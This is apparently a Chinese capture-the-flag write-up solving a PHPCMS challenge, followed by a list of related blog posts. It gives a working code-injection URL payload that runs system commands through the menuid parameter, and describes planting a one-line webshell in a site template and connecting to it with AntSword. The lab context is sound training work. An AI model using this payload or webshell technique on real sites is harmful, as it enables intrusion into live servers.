CMS系统漏洞分析溯源(第2题)

从题目得知是PHPCMS搭建的网站,从这里可以在网上搜到PHPCMS的漏洞以下为该漏洞的介绍帖

PHPCMS v9.6.0 任意文件上传漏洞分析 - FreeBuf网络安全行业门户

步骤:

方法一:

首先用yakit扫描找到后台,发现可以直接登录

登陆后直接利用漏洞查看文件列表

复制代码
/index.php?0=ls&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block

得到key的名称后直接把ls改为cat key_xxxxxxx.php,再按f12或者CTRL+U查看网页源代码,得到key

方法二:

也是用yakit扫描出的后台进行登录,然后点击界面→模块风格→defaul详细列表→search→index.html 在结尾或者开头插入一句话木马,尽量不要破坏整个html

再使用蚁剑连接连接地址http://ip:port/index.php?m=search,这里解码器需要选择chr

相关推荐
数据库小学妹1 天前
数据库等保三级和四级有什么区别?从访问控制到备份恢复的完整对比
数据库·安全·数据库安全·三级等保·等保合规·四级等保
鹿鸣天涯1 天前
CISP认证学习笔记
安全·cisp
Lust Dusk1 天前
记一次Linux应急响应题目解析
linux·运维·服务器·网络·安全·网络安全
笨鸟先飞,勤能补拙1 天前
AI 安全的下一个 5 年:从 Agent 到 AGI 的攻防博弈
人工智能·python·安全·web安全·网络安全·github·agi
志栋智能1 天前
安全超自动化如何增强事件响应能力
运维·安全·自动化
数据知道1 天前
OWASP Top 10 实战通关指南:总览篇
网络·安全·网络安全
雨辰AI1 天前
K8s 国产数据库慢 SQL 自动监控|Prometheus+Grafana 可视化全落地
数据库·sql·安全·容器·kubernetes·grafana·prometheus
Lust Dusk1 天前
记一次web渗透做题思路解析
网络·安全·web安全·网络安全
山东科恩光电1 天前
如何通过科学安装安全地毯提升工作场所的防护效果?
安全
飞跨浏览器1 天前
跨境电商浏览器是什么?多店铺安全环境怎么搭建
安全